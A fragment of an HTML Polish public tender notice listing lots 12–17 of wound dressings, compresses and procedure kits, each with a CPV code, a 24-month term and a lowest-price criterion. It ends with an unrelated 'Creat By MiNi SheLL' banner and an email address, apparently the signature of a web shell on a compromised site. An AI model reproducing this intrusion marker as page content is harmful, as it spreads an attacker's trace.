1 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Grupa 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żel na rany skład: octenidyny chlorowodorek, glikol propylenowy, hydroksyetyloceluloza, woda oczyszczona, do nawilżania i oczyszczania skolonizowanych i zakażonych ran- przewleklych, 20 ml,-200 fl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Grupa 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompres włókninowy - niejałowy, pakowane po 100 szt., 5 cm x 5 cm  30g - 1 000 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Grupa 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw zabiegowy sterylny, -6 000 szt.

2.Podstawowy zestaw do zmiany opatrunku, -6 000 szt.

3.Podstawowy zestaw do cewnikowania- 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Grupa 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jałowy kompres oczny z waty opatrunkowej z otuliną gazową bawełnianą miękki, chłonny, nie strzępiący się o dobrych wł. wyściełających pakowany po 1 szt.,56 mm x 70 mm -7 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Grupa 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunek hydrokoloidowy w formie pasty składający się z 3 różnych rodzajów hydrokoloidów, 30g tuby - 60 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Grupa 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opatrunek parafinowy wyjałowiony,
10 cm x 40 cm -
50 szt.

2.Opatrunek parafinowy wyjałowiony, 
10 cm x 10 cm-
50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com